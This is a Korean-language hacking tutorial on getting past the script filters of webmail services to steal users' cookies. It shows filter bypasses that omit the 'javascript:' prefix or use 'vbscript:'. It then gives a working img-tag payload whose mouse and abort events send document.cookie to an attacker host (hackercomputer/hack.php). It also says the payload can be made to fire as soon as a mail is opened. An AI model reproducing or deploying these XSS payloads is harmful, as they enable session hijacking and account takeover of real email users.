예전에 쿠키 스니핑이 이슈가 된적이 있었죠? 지금도 쿠키 스니핑이
되는 것들이 많이 있습니다.

이 쿠키 스니핑이 이슈가 된 후에 많은 메일 서비스 회사들이
쿠키 스니핑에 이용되는 javascript 를 사용하지 못하도록 막아놓았습니다.
특정 문자열을 다른 문자열로 바꾼다던지 하는 방법들을 사용해서
막은 것이죠.
(그런데 어떤 회사들은 아예 대처를 하지 않았더군요. 여기선 그나마 대처를
해놓은 서버들에 대한 필터링 방법에 대해서 이야기합니다.)

하지만 이 것들을 다른 방법으로 피해갈 수 있습니다.

먼저 그 브라우저에서 다른 페이지를 읽어오려면 iframe 이나 embed
혹은 img 태그 등을 이용하면 됩니다. 그 페이지에서는 쿠키를 담는
스크립트를 쓰면 되겠죠. 그 방법에 대해서는 제가 제로보드 4.0 취약성에
대해서 쓴 글을 읽어보시면 될 것 같습니다.

여기서 설명드릴 방법은 자바 스크립트를 사용하지 못하게 조취를
취한 곳에서 스크립트를 사용하는 방법을 말씀드리겠습니다.

먼저 메일 서비스 회사에서 어떤 식으로 자바스크립트를 사용하게 못하는지
알아보도록 하겠습니다. 자바 스크립트를 사용하기 위해서는

<script language=javascript>

이런 식으로 선언문을 주어야 합니다. 만약 이걸 막기 위해서는
<script 라는 문자열을 없애거나 다른 문자열로 바꾸면 되겠습니다.
특정 메일 서비스 회사에서는 <script 를 <script-x 이런 식으로
바꾸어 버립니다.

그리고 또 다른 형식으로 사용할수도 있습니다.

<a href=tt.html onclick=javascript:alert("haha")>keke</a>

이렇게 하고 만약 keke 링크를 사용자가 마우스로 클릭했을때
haha 란 내용의 경고창이 뜨게 됩니다. 이 경우에도 대비해 메일 서비스
회사에서는 javascript 를 java-script 로 바꿔버립니다.

<script 와 javascript 를 사용하지 못하게 특정 문자열로 바꾸었으니
스크립트를 사용하기 어렵겠죠.

하지만 다른 방법으로 회피가 가능합니다.

스크립트를 사용하려 할때 꼭 <script 와 javascript 가 필요하지
않다는 것을 이용하면 됩니다. 예를 들면?

<a href=tt.html onclick=alert("haha")>keke</a>

이렇게 앞에 javascript 라는 문자열을 빼버리면 우리의 웹브라우저에서는
디폴트로 실행할 스크립트를 찾고 실행합니다. 대부분이 vbscript 아니면
javascript 일 것입니다.

그리고 메일 서비스 회사에서는 vbscript 라는 단어를 필터링 하지않습니다.

<a href=tt.html onclick=vbscript:alert("haha")>keke</a>

어떤가요 간단히 스크립트 필터링을 피할수 있죠?

그럼 한가지 예를 들어서 스크립트를 사용하는 방법을 설명하겠습니다.

<img src=http://image.hanmail.net/hanmail/image/hanmail/daumlogo.gif
onMouseMove=window.open("http://hackercomputer/hack.php?haha="+document.cookie)
onabort=window.open("http://hackercomputer/hack.php?haha="+document.cookie)>

위 태그에 대한 간단한 설명을 드리겠습니다. img 태그에 이벤트를 건것인데
만약 사용자가 저 그림 위에 마우스를 갖다 대거나 아니면 이미지를 로딩하는
도중에 중지를 눌러서 이미지 로딩을 실행한다면 현재 쿠키값을
http://hackercomputer/hack.php 의 인자로 넘겨주면서 브라우저를 오픈하게
됩니다.
(넘어온 쿠키 값을 저장하는 방법에 대해서는 제로보드 4.0 취약성에 대해서
참조해주세요)

이벤트를 적절히 활용한다면 메일을 읽자마자 바로 쿠키값을 전달하는
태그를 쓸수도 있을 것입니다.